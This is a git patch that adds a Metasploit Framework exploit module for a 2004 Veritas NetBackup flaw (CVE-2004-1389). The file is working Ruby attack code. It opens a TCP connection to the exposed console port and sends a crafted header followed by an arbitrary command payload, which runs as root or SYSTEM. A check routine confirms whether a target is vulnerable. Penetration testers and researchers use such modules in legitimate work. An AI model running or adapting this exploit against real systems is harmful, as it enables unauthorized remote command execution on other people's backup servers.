From 086e9fb89a35db29b38b002c2ce6e3ed604b159c Mon Sep 17 00:00:00 2001 From: Patrick Webster Date: Thu, 13 Nov 2008 09:45:47 +0000 Subject: [PATCH] Added veritas_netbackup_cmdexec module. git-svn-id: file:///home/svn/framework3/trunk@5914 4d416f70-5f16-0410-b530-b9f4589650da --- .../multi/misc/veritas_netbackup_cmdexec.rb | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb new file mode 100644 index 0000000000..0dbaa55d3c --- /dev/null +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -0,0 +1,92 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VERITAS NetBackup Remote Command Execution', + 'Description' => %q{ + This module allows arbitrary command execution on an + ephemeral port opened by Veritas NetBackup, whilst an + administrator is authenticated. The port is opened and + allows direct console access as root or SYSTEM from + any source address. + }, + 'Author' => [ 'patrick' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision', + 'References' => + [ + [ 'OSVDB', '11026' ], + [ 'CVE', '2004-1389' ], + [ 'BID', '11494' ], + [ 'URL', 'http://seer.support.veritas.com/docs/271727.htm' ], + + ], + 'Privileged' => true, + 'Platform' => ['unix', 'win', 'linux'], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => '', + 'DisableNops' => true, + }, + 'Targets' => + [ + ['Automatic', { }], + ], + 'DisclosureDate' => 'Oct 21 2004', + 'DefaultTarget' => 0)) + end + + def check + connect + + sploit = rand_text_alphanumeric(10) + buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n" + + sock.put(buf) + banner = sock.get(3,3) + + disconnect + + if (banner and banner =~ /#{sploit}/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + connect + + sploit = payload.encoded.split(" ") + + buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n" + buf << payload.encoded + buf << "\n" + + sock.put(buf) + res = sock.get(-1,3) + + print_status("#{res}") + + handler + disconnect + end + +end +